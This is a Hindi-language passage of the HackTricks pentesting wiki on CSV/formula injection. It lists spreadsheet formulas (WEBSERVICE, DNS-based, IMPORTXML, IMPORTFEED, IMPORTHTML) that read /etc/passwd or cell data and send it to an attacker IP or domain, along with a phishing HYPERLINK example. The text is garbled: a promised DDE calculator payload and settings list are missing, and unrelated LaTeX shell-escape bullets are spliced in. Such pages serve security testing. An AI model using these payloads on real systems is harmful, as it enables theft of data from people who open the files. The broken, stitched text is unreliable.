<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
यदि आपका **इनपुट****CSV फ़ाइल** (या किसी अन्य फ़ाइल) में **प्रतिबिंबित** हो रहा है जो कि संभावित रूप से **एक्सेल** द्वारा खोला जाएगा, तो आप एक्सेल **सूत्र** डाल सकते हैं जो उस समय **चलाया जाएगा** जब उपयोगकर्ता फ़ाइल **खोलता है** या जब उपयोगकर्ता एक्सेल शीट के अंदर किसी लिंक पर **क्लिक करता है**।
आजकल **एक्सेल** (कई बार) **उपयोगकर्ता को चेतावनी देगा** जब कुछ बाहर से एक्सेल में लोड हो रहा है ताकि उसे दुरुपयोग से बचाया जा सके। इसलिए, अंतिम पेलोड पर सोशल इंजीनियरिंग पर विशेष प्रयास किया जाना चाहिए।
**निम्नलिखित उदाहरण अंतिम एक्सेल शीट से सामग्री निकालने और विभिन्न स्थानों पर अनुरोध करने के लिए बहुत उपयोगी है। लेकिन इसे लिंक पर क्लिक करने की आवश्यकता होती है (और चेतावनी प्रॉम्प्ट को स्वीकार करना चाहिए)।**
एक छात्र रिकॉर्ड प्रबंधन सिस्टम में सुरक्षा उल्लंघन की एक CSV अधिष्ठापन हमले के माध्यम से उत्पन्न एकल है। हमलावर का प्राथमिक उद्देश्य शिक्षकों द्वारा छात्र विवरण प्रबंधित करने के लिए उपयोग किए जाने वाले सिस्टम को क्षति पहुंचाना है। इस विधि में हमलावर एक दुरुपयोगी पेलोड को एप्लिकेशन में डालता है, विशेष रूप से छात्र विवरण के लिए निर्धारित क्षेत्रों में हानिकारक सूत्र द्वारा। हमला निम्नलिखित प्रकार से खुलता है:
* हमलावर एक छात्र विवरण फॉर्म सबमिट करता है लेकिन एक फॉर्मूला शामिल करता है जो स्प्रेडशीट में सामान्य रूप से उपयोग किया जाता है (जैसे, `=HYPERLINK("<malicious_link>","यहाँ क्लिक करें")`।)
* यह फॉर्मूला हाइपरलिंक बनाने के लिए डिज़ाइन किया गया है, लेकिन यह हमलावर द्वारा नियंत्रित एक दुरुपयोगी सर्वर की ओर पोइंट करता है।
* हमलावर फिर इस डेटा का उपयोग विभिन्न दुरुपयोगी उद्देश्यों के लिए कर सकता है, जिससे छात्रों और संस्थान की गोपनीयता और सुरक्षा को और अधिक क्षति पहुंच सकती है।
विशेष विन्यासों या पुराने संस्करणों में, एक सुविधा जिसे डायनामिक डेटा एक्सचेंज (DDE) कहा जाता है, विभिन्न आदेशों को निष्पादित करने के लिए उपयोग किया जा सकता है। इसका लाभ उठाने के लिए, निम्नलिखित सेटिंग्स सक्षम होने चाहिए:
जब एक दुरुपयोगी पेलोड के साथ एक स्प्रेडशीट खोला जाता है (और यदि उपयोगकर्ता चेतावनियाँ स्वीकार करता है), तो पेलोड निष्पादित होता है। उदाहरण के लिए, कैलकुलेटर एप्लिकेशन को लॉन्च करने के लिए, पेलोड होगा:
* एक से अधिक पंक्ति निकालना: `=WEBSERVICE(CONCATENATE("http://<हमलावर IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS निकालना (पढ़ा हुआ डेटा एक हमलावर नियंत्रित DNS सर्वर के रूप में DNS क्वेरी के रूप में भेजना): `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<हमलावर डोमेन>"))`
* **CONCATENATE**: स्ट्रिंग को जोड़ता है - `=CONCATENATE(A2:E2)`
* **IMPORTXML**: संरचित डेटा प्रकार से डेटा आयात करता है - `=IMPORTXML(CONCAT("http://<हमलावर IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")`
* **IMPORTFEED**: RSS या ATOM फ़ीड आयात करता है - `=IMPORTFEED(CONCAT("http://<हमलावर IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))`
* **IMPORTHTML**: HTML तालिकाओं या सूचियों से डेटा आयात करता है - `=IMPORTHTML (CONCAT("http://<हमलावर IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)`
* **IMPORTRANGE**: एक अन्य स्प्रेडशीट से कोशिका के रेंज को आयात करता है - `=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")`
* **`--shell-restricted`**: `--shell-escape` के समान, लेकिन 'सुरक्षित' सेट के पूर्वनिर्धारित \*\*निर्देशों (\*\*Ubuntu 16.04 पर सूची `/usr/share/texmf/web2c/texmf.cnf` में है) के लिए सीमित है।
* **`--shell-escape`**: `\write18{command}` निर्देश को सक्षम करें। निर्देश कोई भी शैल निर्देश हो सकता है। इस निर्माण को सुरक्षा कारणों से सामान्यत: निषिद्ध किया जाता है।
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!